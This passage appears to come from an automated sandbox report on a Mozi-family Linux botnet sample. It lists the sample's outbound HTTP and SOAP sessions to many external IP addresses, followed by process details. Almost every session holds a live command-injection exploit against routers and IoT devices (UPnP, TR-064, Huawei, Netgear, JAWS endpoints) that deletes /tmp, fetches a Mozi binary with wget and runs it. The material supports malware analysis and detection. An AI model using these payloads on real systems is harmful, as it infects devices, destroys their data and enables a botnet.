                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        130192.168.2.2338892142.115.135.3280
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582110882 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 142.115.135.32:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        131192.168.2.2345762119.180.236.2468443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582133055 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        132192.168.2.2351804159.189.182.1007574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582169056 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        133192.168.2.233531499.162.112.18752869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582195044 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        134192.168.2.233513038.189.25.21780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582217932 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        135192.168.2.234564295.118.139.23981
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.582243919 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        136192.168.2.2353608194.167.150.1028443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647241116 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        137192.168.2.2337904164.194.135.2385555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647258997 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        138192.168.2.2336750214.127.3.3780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647280931 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        139192.168.2.233954624.51.61.438080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647322893 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        140192.168.2.2342858110.77.244.5449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647351980 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 110.77.244.54:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        141192.168.2.235311471.82.199.1318443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647372961 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        142192.168.2.2347338156.177.99.17949152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.647407055 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 156.177.99.179:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        143192.168.2.2337236159.226.179.18980
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.652884007 CET282OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 159.226.179.189:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        144192.168.2.234736657.233.61.988080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.676489115 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        145192.168.2.235925855.139.42.17449152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.687412024 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 55.139.42.174:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        146192.168.2.233287053.223.145.17480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.687453032 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        147192.168.2.235985827.14.33.798443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.687475920 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        148192.168.2.2350010185.35.83.14637215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.687515020 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 185.35.83.146:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        149192.168.2.234144077.50.212.678443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.742958069 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        System Behavior

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:/tmp/bin.sh.elf
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

